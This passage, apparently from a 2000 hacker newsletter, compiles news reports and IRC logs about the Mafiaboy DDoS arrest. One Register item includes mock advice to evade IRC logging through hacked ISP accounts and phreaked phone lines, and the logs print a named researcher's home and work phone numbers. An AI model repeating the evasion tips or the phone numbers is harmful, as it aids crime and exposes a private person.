As a technical matter, the attacks like the ones we saw last week are easy to carry out and hard to solve. The tools available to launch such attacks are widely available. In addition, too many companies pay inadequate attention to security issues, and are therefore vulnerable to be infiltrated and used as launching pads for this kind of destructive programs. Once the attacks are carried out, it is hard to trace the criminal activity to its source. Criminals can use a variety of methods to hide their tracks, allowing them to operate anonymously or through masked identities.
This makes it difficult – and sometimes impossible – to hold the perpetrator criminally accountable.

Even if criminals do not hide identities online, we still might be unable to find them. The design of the Internet and practices relating to retention of information means that it is often difficult to obtain traffic data critical to an investigation. Without information showing which computer was logged onto a network at a particular point in time, the opportunity to determine who was responsible may be lost.

There are other technical challenges, as well, that we must consider. The Internet is a global medium that does not recognize physical and jurisdictional boundaries. A hacker – armed with no more than a computer and modem – can access computers anywhere around the globe. They need no passports and pass no checkpoints as they commit their crimes. While we are working with our counterparts in other countries to develop an international response, we must recognize that not all countries are as concerned about computer threats as we are. Indeed, some countries have weak laws, or no laws, against computer crimes, creating a major obstacle to solving and to prosecuting computer crimes. I am quite concerned that one or more nations will become "safe havens" for cybercriminals.

Resource issues are also critical. We must ensure that law enforcement has an adequate number of prosecutors and agents – assigned to the FBI, to the Department of Justice, to other federal agencies, and to state and local law enforcement – trained in the necessary skills and properly equipped to effectively fight cybercrime, whether it is hacking, fraud, child porn, or other forms.

Finally, legal issues are critical. We are finding that both our substantive laws and procedural tools are not always adequate to keep pace with the rapid changes in technology.

Are We Supposed To Feel Sympathy For Her?
@HWA

10.6 Mafiaboy:Janet Reno licks chops over Mafiaboy arrest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Posted 20/04/2000 5:11pm by Thomas C. Greene in Washington

Janet Reno licks chops over Mafiaboy arrest

US Attorney General Janet Reno glowed with pleasure during a Wednesday press conference as she wagged her finger and called for the Canadian courts to punish Mafiaboy for causing DDoS mayhem on the Web back in February.

"I think that it's important first of all that we look at what we've seen and let young people know that they are not going to be able to get away with something like this scot-free," Reno told reporters, as if Mafiaboy had already been tried and convicted.

"There has got to be a remedy, there has got to be a penalty."

Reno did stop just shy of telling the Canadian courts precisely what the penalty ought to be. But if Mafiaboy should be convicted, his punishment will undoubtedly be a good deal lighter than anything a malicious hacker might get in the USA, which, it was revealed today, has achieved the distinction of maintaining the world's largest population of citizens locked up in cages.

Reno also took the opportunity to boast about the profound technical savvy of her troops in the field. "I believe this recent breakthrough demonstrates our capacity to track down those who would abuse this remarkable new technology, and track them down wherever they may be," Reno said.

Yeah, right. The Register recalls the very brief period of DoJ triumphalism over Coolio's arrest and how quickly it evaporated, and thinks that this 'recent breakthrough' demonstrates nothing so much as the Feds' desperate need to pounce on any scapegoat they can find in hopes of concealing how hopeless they are in tracking cyber-criminals.

The hacking underground remains wisely reluctant to believe that Mafiaboy is more than a scapegoat, at least until evidence is produced.
The scene has been abuzz with sceptics, while the mainstream press, predictably, appears satisfied that the Mounties have got their boy. Meanwhile, 2600.com has posted a bogus IRC log between a staffer posing as Mafiaboy and one 'Icee' who the magazine claims is the person responsible for tipping the Feds to Mafiaboy's alleged DDoS attacks. We're not entirely sure what the point of this stunt is, except perhaps to demonstrate that anyone can pretend to be anyone else in IRC in hopes of casting doubt on the authenticity of the Mafiaboy logs which are expected to be produced in evidence against him at trial. Nice try, but of course the Feds can obtain both IRC and ISP logs, so it's not terribly hard for them to divine the true origins of IRC traffic. You can go on line as 'Icee' and fool, say, the editors of 2600; but if the Feds can persuade a judge to issue a trap and trace order, they will get all the evidence needed to pin the logs on the dummy....and probably figure out how to piece it together, or at least hire someone with a brain to do it for them. (Note to wannabe leet h4x0rz: IRC traffic is logged, Einstein, so always connect through a hacked ISP account or a freebie such as NetZero where you can register with fictional information; and always dial in from a phreaked telephone account [preferably in Tonga or Madagascar]. If you can't manage that much, then don't say anything in IRC that you wouldn't announce over a bull horn in the lobby of FBI Headquarters.) Speaking in conclusion, again as if Mafiaboy had been tried and convicted, Reno lectured the populace on morality. "We have got to renew our efforts to teach young people -- children -- cyber-ethics," she said. Renew them? We were blissfully unaware that any such efforts had been made in the first place. ® @HWA 10.7 Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ IS MAFIABOY REAL OR A CREATION OF THE MEDIA? 
04/20/00

We'd like to officially express our skepticism on the recent arrest of a Montreal teenager for the Denial of Service attacks back in February. Naturally, we always have reason to be somewhat doubtful whenever the authorities claim to know the first thing about the Internet. But in this case, we wanted to see just how clueless they could possibly be.

When the name "mafiaboy" was first mentioned months ago, a couple of us hopped onto IRC using that nick. Sure enough, within seconds, we were being messaged by people who believed we were the person responsible. Amazingly, the person who fell for it the hardest is the very person now being quoted widely in the media as having caught the perpetrator.

Now perhaps this is all just a big coincidence. But as you can see from the IRC logs below, we dropped a few clues that the person was in a country with snow and at one point "accidentally" spoke French to imply the province of Quebec. We were amazed when the blame actually landed on someone from Montreal.

A good question to ask is why we would want to cause such confusion and mayhem. The answer is to prove a point. That all one needs to do to be considered a suspect is change a nickname on IRC. We had absolutely NO proof that we could provide to make this fictitious person responsible in any way for the attacks. Yet we were believed by countless people, including the "expert" who is taking credit for the arrest. And now we see that the main piece of evidence against the real person who was arrested is the fact that he was "bragging" in an IRC channel. Please.

If this is indeed the person responsible (and what a geographical coincidence THAT would be), we'd like to see them held accountable to a REASONABLE degree. But in order to do this fairly, the evidence must be made public. Otherwise, we will continue to believe that the authorities and the media are more interested in sending a message than actually achieving justice.
-----------------------------------------------------------------------------
[We begin the log after a brief conversation explaining why and how we are on IRC from a different address.]

READ THE LOGS CAREFULLY ALL MAY NOT BE AS IT SEEMS, IE:NO SPEED READING :-)
-----------------------------------------------------------------------------

*icee* is the "security expert" who first pointed the finger at someone named mafiaboy, based solely on conversations he had on IRC.
*** [mafiaboy] is 2600 staff posing as someone on IRC named mafiaboy, shortly after his name was first reported in the news.

(Uh yeah ok ... does 2600 staff do this sort of thing often? hrm ... - Ed)

February 10, 2000 1:07:35 AM

[mafiaboy] if they are looking for this person, they sure as hell would be
*icee* now that is ALL I CAN SAY until i hear more from you
*icee* my docs are this: Michael Lyle, 408-238-3090
*icee* go to a payphone for all the fuck i care
*icee* that way, if you really want, you can take the communications out of band.
*icee* But before i can talk to you, i need that piece of information.
[mafiaboy] one question
*icee* sure.
[mafiaboy] if you have this info. who have you told?
*icee* I can't tell you that, until you tell me the other piece
*icee* but i told no one anything that wasn't already out there.
[mafiaboy] well no one was fucking msging me an hour ago
*icee* look, i'm neither your friend nor your enemy.. i'm an interested party
[mafiaboy] brb
*icee* I'm much closer to a friend than your enemy, though.
[mafiaboy] ok
[mafiaboy] since we need to build some trust here
[mafiaboy] let's cover some things that don't involve disclosing anything non-public
*icee* okay.
[mafiaboy] i need to know why people just started msging me.
*icee* because information about you was disclosed about you on a news broadcaast by my company.
[mafiaboy] you work for a news agency?
*icee* i can't tell you where that information was obtained until I build some trust with you
*icee* no, i work for a computer security firm.
*icee* Please don't wig out at that
[mafiaboy] so is that your interest in this?
*icee* Not really.
*icee* Pieces of it.
*icee* If i can benefit myself without hurting you, i'll take advantage of it.
*icee* But um, i've been in a situation similar to yours before
[mafiaboy] so then, why did you go to the media if no one knew yet?
*icee* i can't really talk about that until we build more trust
*icee* because everyone already knew-- just no one had broken the story hurt you
[mafiaboy] whois everyone?
*icee* fuck.
*icee* look, i need to know more from you
*icee* before i can go into this.
[mafiaboy] well wtf
*icee* and i need to be on a secure mode of communication
[mafiaboy] "everyone" USUALLY includes the media!
*icee* i need to be assured you're not calling into a dirty provider
*icee* or you need to call me or something
*icee* and you need to provide me with that secret
*icee* so i know i'm talking to you
*icee* here's why:
*icee* i'm not doing anything illegal
*icee* but the information that i would give you
*icee* has no value
*icee* if other people get it.
*icee* if not, it stops here: I suggest you talk to a lawyer, and I wish you honestly the best of luck.
[mafiaboy] so let me get this straight
[mafiaboy] 3 days, this is one of the top international news stories. everyone wants to know who is responsible. the fbi and the president make speeches saying they are clueless. You say "everyone knows" and you fucking tell the media????
[mafiaboy] i mean
*icee* look
[mafiaboy] i'mjust trying to make sure i have the full picture
*icee* will you take a valium or something, maybe have a swig of alcohol or three..
[mafiaboy] not that it's me or anything
*icee* and just realize the truth here: I'm trying to be your friend.
*icee* doesn't put you in any more danger
*icee* if i was a fed, and i didn't know who you are
[mafiaboy] i think perhaps you should take a step back and think about this from my end
*icee* by now, someone would have installed logging access lists and figured out your ultimate source address
*icee* and coordinated the data from calling records
*icee* and know exactly where you are right now.
*icee* Keeping you in the conversation this long would have been enough
*icee* but that was not my objective.
*icee* nor am i working with the FBI
[mafiaboy] i nver said you were
*icee* so please realize you're giving me nothing more, and get a secure line of communication with me, and talk to me
[mafiaboy] i know you're not a fed. you're with Recourse Technologies in sunny palo alto
*icee* I understand it has to be scary as fuck, and i understand i'm not being easy to work with
*icee* oh, did you listen to our radio stuff up there in Canada, too?
[mafiaboy] you were on the radio too???
*icee* i think they're the only people i talked to who called it sunny palo alto
*icee* I am not out to get you.
[mafiaboy] who are you fucking Shimomura?
*icee* yes.
*icee* no
*icee* I am not out to get you.
[mafiaboy] we don't even know eachotehr and you're already looking for your markoff
*** icee has changed the topic on channel #recourse to: *mafiaboy* who are you fucking Shimomura?
*icee* No I'm not.
*icee* I'm not trying to go down as the person who nailed you
*icee* people already did that
*icee* And i could tell you more about it
*icee* if you'd just fucking talk to me
*icee* but listen to why i can't:
*icee* if you are not the mafiaboy i think
*icee* and i reveal the information
*icee* i've destroyed its utility
*icee* and then i wouldn't have done you much of a favor now, would i have?
[mafiaboy] if i'm already nailed, how come no raid?
*icee* do you know what flow stats are? logging access lists?
*icee* i can tell you quite clearly how you were nailed
*icee* and i can tell you why there's no raid
*icee* but i NEED INFORMATION
*icee* and the thing is
*icee* I'm willing to help you for two reasons:
[mafiaboy] it's going to be a while before i can get to another means of communication
*icee* I was in a situation once similar to yours, sort of
*icee* and I'm hoping that if i help you a bit, maybe you'll help me a little too
*icee* well, are you on sympatico now?
[mafiaboy] no
[mafiaboy] one question though, is it politics?
*icee* Okay, then can we take it to DCC? I consider that safe.
*icee* why you're not?
*icee* yes.
*icee* that'll buy you a couple of days at most.
[mafiaboy] they're capitalizing off it
[mafiaboy] ?
*icee* that and the fact the FBI got a little confused
*icee* it's the fact that it crosses national borders, and there's difficult procedural problems to solve.
*icee* none of the evidence is in .ca
*icee* or very little of it.
*** DCC CHAT (chat) request from icee[icee@dragon.ender.com [206.79.254.229:4135]]
*** BitchX: Type /chat to answer or /nochat to close
>>> icee [icee@dragon.ender.com] requested DCC CHAT from mafiaboy
[mafiaboy] won't accept
*icee* okay.
*icee* how do we do this, then?
*** DCC Auto-closing idle dcc CHAT to icee
*icee* I'm willing to do it on your terms, within reason.
*icee* look, i'm just a 20 year old guy, i'm sitting in my computer room, my girl's sitting here by me, we're eating pizza
[mafiaboy] ok. this whole stalling because of politics thing. is that your analysis or do you have a source on this?
[mafiaboy] (i don't need your source)
*icee* look
*icee* This is where it stops
*icee* yes i have a source
*icee* i can't say any more.
*icee* until we get out of band somehow.
[mafiaboy] i'm just trying to gauge credibility here
*icee* look
*icee* hint: i used to work for exodus communications.
*icee* where is buy.com? where is ebay?
[mafiaboy] hmm
[mafiaboy] is it an official delay? 2600.com is talking about conspiracy shit
*icee* that's where we're getting to things i don't know, but i don't buy it's a conspiracy in my personal opinion to be honest
*icee* 2600 isn't worth the paper it's printed on
[mafiaboy] that # you gave me, where is it?
*icee* San Jose, CA.
*icee* It's my main home phone number.
*icee* I'm trusting you.
[mafiaboy] k, landline?
*icee* yes.
*icee* it'll be answered on a cordless phone if that's okay
*icee* i doubt the feds are outside my house.
*icee* And if so, they could just bug the actual line ;P
[mafiaboy] 900mhz?
*icee* or use LMOS and make it easy
*icee* 2.4GHz spread spectrum (CDMA)
[mafiaboy] k, call you from prison ;)

End log

(Remember, if you don't have any real news or real logs, just make up your own! - Ed)

---------------------------------------------------------------------------

IRC log started Thu Feb 10 19:23
*** Value of LOG set to ON
*** mafia_boy has joined channel #recourse
*** Users on #recourse: mafia_boy Telastyn meesh ssorkin @rross icee
*** #recourse 949885504
*** mafia_boy has left channel #recourse
*** No target, neither channel nor query
*** You have been marked as being away
*** Signoff by mafiaboy detected
*icee* is that you?
[mafiaboy] no THIS is me
*icee* yah?
*icee* so what's up?
[mafiaboy] watching cnn, haha
*icee* yah?
*icee* so did you see me?
[mafiaboy] no, just started
*icee* Look, here's the deal. ssh to some account somewhere that they didn't know about, or something, so we have a secure channel, so we can talk.
[mafiaboy] why
[mafiaboy] they dont know about this one, not yet anyway
*icee* okay, then let's take it out of band, in DCC.
*** DCC CHAT (chat) request received from icee
*** DCC CHAT connection with icee[206.79.254.229] established
=icee= okay. we talked last night, right?
[mafiaboy] yep
=icee= (i'm asking because with the circumstance, there's fair odds someone might message me and pretend to be you)
=icee= okay, we need to solve this trust problem, and prove you are who you say you are.. so the name of the channel.. it starts with a m. can you tell me it?
=icee= #bifemunix is a rival.
[mafiaboy] 3090
[mafiaboy] good enough?
=icee= okay, that's good enough, but i don't know if that was the brightest thing to say when we could be possibly listened to
=icee= Okay:
=icee= here's the deal:
=icee= the authorities have a large amount of information which has been salvaged from machines taken into evidence, as well as:
=icee= flow statistics on routers
=icee= routers keep information on all layer 4 connections for the purpose of ensuring quality of service
=icee= because the information is kept in the router for a length of time, it serves as a pretty accurate way to see what host has talked to what other host recently
=icee= sprint, mci, abovenet, and exds all worked together and put the flow information together
=icee= they were also able to correlate information from a number of different sources, like logging access lists on routers
=icee= From the RUMORS i'm hearing, the only thing keeping you out of jail at the moment is geopolitical issues, and the fact that they don't think you're behind all of the attacks
=icee= I think the general idea is, they're going to swoop in, get you in custody, and then when you can't talk to anyone else or do anything else, completely fuck you over
=icee= So I have a couple of different recommendations, depending on what road you want to take
=icee= 1) get a lawyer, surrender to custody, try to plea bargain
=icee= or 2) publically make a statement
=icee= because if you don't do something now, your ability to talk to the rest of the world is going to be limited
=icee= if it looks like you didn't know what the fuck you were doing, things can turn out a lot better
=icee= and I have some information, that i certainly can't say over the phone, that could be of great value to your defense attorneys
[mafiaboy] and whats in it for you
=icee= What is in it for me?
=icee= You pick option #1, nothing
=icee= You pick option #2, I'd like to be the person who leads you forward.
=icee= But that's also up to you
[mafiaboy] and then you write a book
=icee= I don't want to write a book
=icee= i want to sell software
[mafiaboy] i have some software here
=icee= what's that mean?
=icee= recourse technologies is a software company
[mafiaboy] haha
=icee= The other thing is: i might be able to be a witness in your favor
=icee= and I could certainly help in substantiating you didn't launch all of the attacks
=icee= I only know for certain you nailed CNN.
[mafiaboy] but you dont really
=icee= okay, here's the things i know
=icee= i know a sympatico ip, and a time; i know everyone says you did it; and i know you use sympatico.ca
=icee= or used.
=icee= the second set of facts help me more than the FBI; but the first is enough for them to nail you.. see?
=icee= btw, don't call me now, i'm not at home.
=icee= of course, you could call me at work, 650-565-8601 ext 107
=icee= let me tell you my personal opinions: i think denial of service is lame as fuck
=icee= and i don't think what you did was particularly cool
=icee= i think you probably didn't realize the implications though, either
[mafiaboy] i gotta smoke and walk around a while
=icee= *nods*
=icee= Just look:
=icee= if you think carefully, and don't freak out
=icee= you can get community service, and end up picking up trash or something
=icee= for 300 hours.. not fun, but better than spending time in juvvie
[mafiaboy] oui
[mafiaboy] ack
[mafiaboy] misfire
=icee= re
=icee= so, any clue what you're going to do?
[mafiaboy] no, i was just talking to a friend on the payphone
=icee= bleh, not talking to me anymore?
[mafiaboy] i dont think i'm in any danger here
=icee= um, why not?
[mafiaboy] many reasons
=icee= Look:
=icee= i don't know if you've heard of me or not
=icee= but at one time i was considered the very, very best
=icee= and i don't possibly understand how you could consider your position safe.
[mafiaboy] why arent you best any more
=icee= you have lots of people who are willing to rat on you who saw you demonstrating your might, there's definite information which ties you to a dialup address.. and i don't see what diversion you could have done through the phone system to adequately protect yourself
=icee= I'm best in something different, now.
=icee= I do mathematics and analyze networks.
=icee= I broke in to things to find out about computers and learn
=icee= once i got legitimate access to them, there wasn't a lot of reason to do it anymore
=icee= and besides: computer security is a much tougher problem than breaking something to take it down or break in
[mafiaboy] you still know ppl in the scene??
=icee= I know a lot of people
=icee= but to be honest:
=icee= the scene is very lame
=icee= 99.9999% today have never written exploit code
=icee= i come from a different time, and a different ethic
=icee= what we were doing used to stand for something
=icee= now it's just not the same anymore.
[mafiaboy] dont know much bout the past
=icee= well, i'd like to tell you about it, sometime.
=icee= see, i'm sure you've read some shit by the mentor, right?
[mafiaboy] but you sound like a friend of mine
=icee= i knew the mentor, even hear from him time to time
=icee= his name came from the fact that he took an active part in taking people new to the scene, who showed promise, and showed them how to move forward and what to learn
=icee= i kinda have had that role in the past
=icee= a lot of people who you probably know now have learnt from me
=icee= Basically, I've never wanted attention or anything
=icee= the only reason i'm on TV now, is the fact that I have 20 people whose livelihoods depend on the fact they've trusted me
=icee= and what is good for my company is good for them
=icee= to be honest i was terrified to death of it and wanted to go home after the second radio interview
=icee= here's the deal though:
=icee= i'm your friend, and i'm available to provide you with information
=icee= but, these are the conditions:
=icee= I am not going to do anything that incriminates myself
=icee= and if i get subpoenaed i will cooperate, so you want to limit that which you say to me
=icee= and if there's something you can do in the future that benefits me, without hurting you, i'd like you to please consider it.
=icee= if you want to come forward, and get your situation known to the public...
=icee= then i would like to facilitate that.
=icee= but it's just if you choose that road.
[mafiaboy] see
[mafiaboy] i dont know you
=icee= *nods*
=icee= and there's one last thing:
=icee= i have a piece of information which is extremely valuable in your defense
=icee= regarding the handling of the case, and a crucial mistake which was made
=icee= Look, you've gained favor among a little crowd, but be honest with me, you know that almost anyone could install the tools that you did
=icee= I could show any 12 year old who could read how to in an hour
=icee= run exploit, compile, install program, put in startup scripts .. rinse, repeat, whatever
[mafiaboy] yes but nobody did it
=icee= but WHY do it?
[mafiaboy] snowday
[mafiaboy] haha
=icee= right now they're blaming a 500 point drop in the Dow on you; saying you had tens of millions of dollars of economic impact
=icee= you think they're not going to put the pieces together?
=icee= there's an infinite set of different kinds of information which can be used to nail you; forensic data on the machines you compromised (deleted files; residues in kernel memory if the machine was taken down), there's residues of the information in the routers; in SNMP audit logs in hp openview
[mafiaboy] maybe people will invest in something else and the dow will go back up?
=icee= RADIUS logs
[mafiaboy] but nobody will give credit for that
=icee= Hey, you and I both know nothing has changed; the Dow bounced back today, people will re-invest in ecommerce, it won't really change anything
=icee= but the fact is: Janet Reno has put her career on the line saying they'll catch you
=icee= and the entire FBI reports to her
=icee= and like, i don't know if you did etrade or datek, but if you did either of those, you're likely to be particularly fucked.
[mafiaboy] no comments
[mafiaboy] ;]
=icee= well, obviously: i don't want to know.
=icee= But i can tell you this: you're definitely fucked on CNN.
[mafiaboy] you mean aol?
=icee= well, BBN
=icee= did you just mean to take down AOL, and nailed CNN, too?
[mafiaboy] see above no comments
=icee= heh
=icee= that's a bummer

@HWA

10.8 Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Posted 19/04/2000 6:05pm by Thomas C. Greene in Washington

Canadian Feds charge Mafiaboy in DDoS attacks

Canadian authorities have charged a fifteen-year-old boy with two counts of "mischief to data" for taking part in the distributed denial of service (DDoS) attacks which shut down popular Web sites such as Yahoo!, eBay, CNN and Amazon in February, and which finally brought a healthy scepticism of Internet security into the mainstream consciousness.
Royal Canadian Mounted Police Inspector Yves Roussel said they were tipped off when the lad boasted in Internet chat rooms about what he had done. Police obtained a warrant and searched his Montreal home, seizing computers and software and placing the lad under arrest on 15 April, he said.

Mafiaboy appeared before a Montreal Youth Court judge on Monday and was released, but with strict conditions.

"Considering the seriousness of the charges, and consequences derived from the alleged actions, and in order to prevent further attacks, bail conditions were imposed. Hence, Mafiaboy is prohibited from the use of a computer except at school for academic reasons; and he must be under the direct and constant supervision of a teacher or another [adult] supervisor," Roussel said during a Wednesday press conference.

"They liked to show off that they were good at it, and that, you know, they are the best; but it is our evaluation that Mafia boy is not that good, actually. He had a good knowledge of computers; however, he wasn't what we could call a genius," Roussel added.

The on-going investigation is a joint operation of the RCMP's Computer Investigation Unit, the FBI and US Department of Justice. More arrests could be made, Roussel indicated, but offered no further details.

"Wherever they are, [malicious] hackers will be investigated and arrested," he warned. ®

@HWA

10.9 Mafiaboy:Canadian Teen Charged in Web Blitz
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Canadian Teen Charged in Web Blitz

_ Some of the Hacked Sites _

Excite: Response times slowed for about an hour and many people were unable to get through.
E-Trade: Sporadic morning outages for a day.
ZDNet: Offline for several hours one day.
CNN: Certain areas of the site stalled for nearly two hours.
MSN: Only some customers experienced problems over a two-day period.
Amazon: Increased traffic slowed the site.
eBay: Down for most of a day.
Buy.com: Jammed for several hours.
Yahoo: Down for three hours.
Source: Staff and Wire Reports

Anatomy of the Attacks

By David A. Vise and Ariana Eunjung Cha
Washington Post Staff Writers
Thursday, April 20, 2000; Page A01

A 15-year-old Canadian computer whiz known online as "Mafiaboy" yesterday became the first person to be charged with carrying out one of the cyber-attacks in February that disabled a string of the Web's most high-profile sites.

Law enforcement officials said the youth, a Montreal resident, was arrested on the basis of evidence linking him to the attack on CNN.com, which involved flooding the site with so many requests for information that legitimate users were effectively locked out. The officials said they are still investigating his potential involvement in other strikes.

U.S. and Canadian agents working on the case declined to comment on the probability of other arrests, but computer experts who have worked closely with them say Mafiaboy is likely a copycat because the assault program he used was so different from the ones used to cripple Yahoo, the first site to go down, and several others.

The Royal Canadian Mounted Police (RCMP) arrested the youth at his home on Saturday, seizing all his computers. He was charged with two counts of "mischief" against the CNN site before being released to the custody of his parents, pending trial in Montreal youth court. Because of the suspect's age, his name and address cannot be released under Canadian law.

The attacks, which took place Feb. 7 through 14 and also affected Buy.com, eBay, Amazon.com and E-Trade, shut users from around the world out of the news and trading systems they are beginning to depend on, cost corporations millions of dollars, and showcased the vulnerabilities of the Internet. The events caused many to question the security of the vast World Wide Web, although no personal financial information was compromised.
Mafiaboy could receive a maximum of two years in a juvenile detention facility and have to pay a fine of about $680, RCMP Inspector Yves Roussel said. But Roussel said it would be unusual for the youth to get jail time: "Even with adults, it's rarely done that a court will impose imprisonment for this crime."

As a condition of his release, Canadian police and U.S. Justice Department officials said the young man is prohibited from using the Internet, visiting stores or businesses that have computers, using computers in an unsupervised setting, and associating with three close friends. He is permitted to use a computer at school for academic work, provided teachers watch his every move. He also has a curfew, requiring him to be at home from 8 p.m. until 7 a.m. every day.

Investigators are looking into the possibility that other hackers may have been working with Mafiaboy. Roussel said that investigators still had "tons" of evidence seized at Mafiaboy's house to evaluate and that others may be charged later.

Joel De La Garza, a consultant with Palo Alto, Calif.-based security firm Securify Inc. who has been tracking Mafiaboy for about a year, said that before the attacks on CNN, Mafiaboy openly asked for and received technical assistance from several other people in an online chat room so that he could break into computers he hoped to use as launch pads for his attacks.

Mafiaboy was part of a group of youths who spent hours on a password-protected chat channel called TNT on the Internet's original discussion network, EFNet, which is part of Internet Relay Chat (IRC). His group was a bunch of "script kiddies," a derisive term used for people who use cookie-cutter hacker attack tools readily available on the Web and don't have the skills to create their own, De La Garza said.

Indeed, Mafiaboy and some of his friends were known to regularly take down some of the EFNet servers using the same type of strategy that was employed against Yahoo and the other popular sites.

"It doesn't take someone with a computer science degree or a vast amount of technical sophistication," said Mike Vatis, head of the FBI's National Infrastructure Protection Center, "but it does take a concerted effort and detailed plan to break in these sites and plant your code and deploy it."

The name Mafiaboy arose early in the FBI's investigation. Most of the early evidence linking the alias to the attacks was based on logs of online chats provided by private security experts at Securify, Recourse Technologies Inc. and others. But connecting Mafiaboy to a person and address was confusing because many people use that moniker.

Vatis said the FBI's Atlanta and Los Angeles offices helped determine by Feb. 12, or about five days after the computer attacks began, that some of the strikes were coming from a telephone line in Montreal. Two days later the FBI contacted the Canadian police. It took the RCMP one day to identify where Mafiaboy lives, but it then took weeks to determine who in the house was responsible for the attacks.

Early on, federal officials, private individuals and curious computer wonks began trolling the IRC networks, popular haunts for hackers, hoping that the culprits would brag about their achievements. Dozens of hackers and hacker wanna-bes did claim credit for the attacks. But Michael Lyle of security firm Recourse in Palo Alto said one person, Mafiaboy, stood out.

Lyle said he and other people from his company engaged Mafiaboy in several online conversations. Mafiaboy claimed to have attacked CNN.com and E-Trade, among other sites. Those two sites went down within five to 10 minutes after Mafiaboy announced that he would cripple them, Lyle said.

Lyle described Mafiaboy as naive: "I don't think he understood the scope of his actions or the effects on other people. I think it was him saying, 'Boy, wouldn't it be cool to take down sites?' "

The discovery of an attack program planted on a research computer at the University of California at Santa Barbara the week after the assaults began turned out to be a pivotal break in the case, according to people familiar with the investigation.

In a typical "distributed denial of service" strike, such as the one that disabled CNN.com, attackers first break into multiple computer systems and plant malicious programs they activate remotely. The "zombie" machines act in concert, flooding a target site with requests for information, shutting out real users.

The UC-Santa Barbara computer is among the dozens to hundreds thought to have been used in the recent attacks. Kevin Schmidt, a network programmer on the campus, found some extra data packets leaving the school's computer system and traced them back to a hacked machine that was attacking CNN.com. He said the work was "sloppy" and left an obvious trail, which he was able to trace back to a handful of computers in the United States and Canada.

FBI Director Louis J. Freeh called the arrest of Mafiaboy a milestone in global law enforcement efforts to battle cyber-crime. "This and other recent cyber-crime successes demonstrate the strengths to be drawn from an international law enforcement-private sector partnership," he said. Among the agencies involved in the investigation was the National Aeronautics and Space Administration, which has often been the target of hacker attacks.

But some facts indicate at least one other party likely was involved in the February attacks.

The software programs launched against Yahoo and eBay--the first high-profile sites to be hit--were radically different from those that hit CNN and E-Trade later in the week, according to security experts. The first were significantly more powerful than the latter programs, according to people who have analyzed them, and who believe it makes little sense for the attacker to have switched to an inferior strike method.

"That's like saying I'm going to get into a fight and I'm going to trade my Uzi in for a stick," said Securify's De La Garza, who along with Stanford University computer administrator David Brumley has been assisting the FBI.

Correspondent Steven Pearlstein in Toronto contributed to this report.

© 2000 The Washington Post Company

@HWA

11.0 Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.washingtonpost.com/wp-dyn/articles/A46086-2000Apr19.html

Canada Arrests 'Mafiaboy' Hacker, Aged 15

Reuters
Apr 19 2000 7:49PM ET

MONTREAL (Reuters) - A 15-year-old hacker, known online as ``Mafiaboy'', was charged by Canadian police on Wednesday with mischief in one of the biggest cyber attacks in history.

The charges relate to the jamming of the CNN.com (TWX.N) Web site and up to 1,200 CNN-hosted sites for four hours on February 8.

Mafiaboy, who cannot be named under a Canadian law that protects the identities of juveniles charged with crimes, was arrested on Saturday and formally charged on Monday, the Royal Canadian Mounted Police told a news conference.

Police Inspector Yves Roussel said investigators were able to track the 15-year-old boy in part because he bragged about his alleged exploit in messages sent to Internet chat rooms.

``This individual, using the nickname Mafiaboy, would have publicized on many occasions that he was the person responsible for those attacks,'' Roussel said.

``The prosecution intends to demonstrate before the court that Mafiaboy is responsible for the denial-of-service attack that was launched for more than four hours on the 8th of February against the CNN site and all the sites that are hosted by this company -- and we're talking roughly 1,200 of those,'' Roussel said.

The Mounties charged Mafiaboy with two counts of mischief to data, which carries a maximum sentence for juveniles up to two years in detention and a C$1,000 ($675) fine.
Mafiaboy has been released but his bail conditions include not using a computer except for academic purposes and under the supervision of a teacher. He is also prohibited from connecting to the Internet or frequenting stores that sell computers or computer paraphernalia.

Police seized all of the computers and related material found at the boy's home.

Police said the investigation into the series of cyber attacks that locked up some of the Internet's most popular Web sites in February continues and there could be other arrests.

The ``denial-of-service'' attacks in early February shut down such Web sites as Yahoo! (YHOO.O), Amazon.com (AMZN.O), eBay (EBAY.O), BUY.COM (BUYX.O), Excite (ATHM.O) and E-Trade (EGRP.O).

Mafiaboy was not charged in connection with the attacks against those sites. The Mounties and FBI declined to say whether they had identified other suspects in the wider investigation involving those sites.

``We had to do something to prevent further actions from Mafiaboy. That's why we arrested him last weekend,'' Roussel said.

``However, the investigation is ongoing and there is literally tons of information to scrutinize. There is a possibility that other people might be arrested,'' he added.

Police would not comment on whether Mafiaboy acted alone in the Web assault on CNN's site or was part of a group. They also would not divulge how many computers he may have used.

In Washington, U.S. Attorney General Janet Reno said on Wednesday that Mafiaboy must face punishment.

``I think that it's important first of all that we look at what we've seen and let young people know that they are not going to be able to get away with something like this scot-free,'' Reno told reporters on Capitol Hill. ``There has got to be a remedy, there has got to be a penalty.''

Reno said the U.S. government continued to work with industry on that incident and others, now that law enforcement has shown it can crack cyber-attack cases.
``I believe this recent breakthrough demonstrates our capacity to track down those who would abuse this remarkable new technology, and track them down wherever they may be,'' she said.

In the February Web site assaults, attackers meticulously obtained remote control of computers around the world. They then used the computers to bombard the targeted Web sites, flooding them with so much data that legitimate users were temporarily denied access or service.

Police refused to provide any details that would identify Mafiaboy, or comment on speculation that he attends a suburban Montreal high school.

The Mounties' Inspector Roussel downplayed Mafiaboy's computing hacking abilities, saying he likely did not have to devise any special programs to gain access to targeted computers.

``It is our evaluation that Mafiaboy was not that good, actually. He had a good knowledge of computers, however, he was not what we could call a genius in that field,'' Roussel said.

William Lynn, an FBI agent who is assistant legal attache at the U.S. Embassy in Ottawa, said investigators were not surprised to discover that Mafiaboy was a juvenile.

``In our profiling of these types of matters it is common for us to consider this as a possibility,'' he told reporters.

The Mounties said their investigation included their Computer Investigation and Support Unit in Montreal, a division of the FBI, the U.S. Justice Department and the U.S. National Infrastructure Protection Center.

Canadian police joined the hunt for the hackers in mid-February as investigators suspected that a Canadian server had been used in the assault.

